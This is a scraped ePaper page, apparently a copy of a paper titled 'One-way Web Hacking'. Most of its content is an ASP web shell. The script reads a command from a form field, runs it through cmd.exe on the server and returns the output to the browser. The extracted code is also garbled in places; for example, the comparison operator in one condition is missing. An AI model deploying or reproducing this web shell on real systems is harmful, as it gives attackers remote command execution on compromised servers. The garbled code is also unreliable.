12.07.2013 Views

One-way Web Hacking

One-way Web Hacking

One-way Web Hacking

SHOW MORE
SHOW LESS

You also want an ePaper? Increase the reach of your titles

YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.

%><br />

On Error Resume Next<br />

Set oScript = Server.CreateObject("WSCRIPT.SHELL")<br />

Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")<br />

Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")<br />

szCMD = Request.Form(".CMD")<br />

If (szCMD "") Then<br />

szTempFile = "C:\" & oFileSys.GetTempName( )<br />

Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)<br />

Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)<br />

End If<br />

<br />

<br />

<br />

<br />

<br />

<br />

If (IsObject(oFile)) Then<br />

On Error Resume Next<br />

Response.Write Server.HTMLEncode(oFile.ReadAll)<br />

oFile.Close<br />

Call oFileSys.DeleteFile(szTempFile, True)<br />

End If<br />

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!